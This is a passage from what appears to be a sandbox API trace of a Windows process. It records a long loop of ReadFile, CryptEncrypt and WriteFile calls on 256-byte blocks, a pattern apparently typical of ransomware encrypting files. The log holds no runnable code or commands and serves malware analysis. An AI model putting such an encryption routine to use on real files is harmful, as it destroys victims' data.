lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.990] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.990] GetLastError () returned 0x0 [0169.990] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.990] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.990] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.990] GetLastError () returned 0x0 [0169.991] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.991] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.991] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.991] GetLastError () returned 0x0 [0169.991] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.991] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.991] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.991] GetLastError () returned 0x0 [0169.991] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.991] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.991] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.991] GetLastError () returned 0x0 [0169.991] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.991] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.991] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.992] GetLastError () returned 0x0 [0169.992] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.992] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.992] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.992] GetLastError () returned 0x0 [0169.992] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.992] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.992] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.992] GetLastError () returned 0x0 [0169.992] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.992] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.992] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.992] GetLastError () returned 0x0 [0169.992] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.992] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.993] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.993] GetLastError () returned 0x0 [0169.993] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.993] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.993] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.993] GetLastError () returned 0x0 [0169.993] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.993] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.993] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.993] GetLastError () returned 0x0 [0169.993] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.993] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.993] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.993] GetLastError () returned 0x0 [0169.993] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.993] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.993] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.993] GetLastError () returned 0x0 [0169.993] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.994] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.994] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.994] GetLastError () returned 0x0 [0169.994] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.994] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.994] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.994] GetLastError () returned 0x0 [0169.994] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.994] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.994] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.994] GetLastError () returned 0x0 [0169.994] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.994] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.994] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.994] GetLastError () returned 0x0 [0169.994] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.995] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.995] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.995] GetLastError () returned 0x0 [0169.995] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.995] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.995] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.995] GetLastError () returned 0x0 [0169.995] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.995] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.995] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.995] GetLastError () returned 0x0 [0169.995] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.995] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.996] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.996] GetLastError () returned 0x0 [0169.996] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.996] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.996] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.996] GetLastError () returned 0x0 [0169.996] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.996] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.996] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.996] GetLastError () returned 0x0 [0169.996] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.996] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.996] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.996] GetLastError () returned 0x0 [0169.996] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.996] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.997] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.997] GetLastError () returned 0x0 [0169.997] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.997] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.997] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.997] GetLastError () returned 0x0 [0169.997] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.997] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.998] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.998] GetLastError () returned 0x0 [0169.998] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.998] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.998] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.998] GetLastError () returned 0x0 [0169.998] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.999] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.999] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.999] GetLastError () returned 0x0 [0169.999] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.999] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.999] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.999] GetLastError () returned 0x0 [0169.999] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.999] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.999] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.999] GetLastError () returned 0x0 [0169.999] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.000] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, 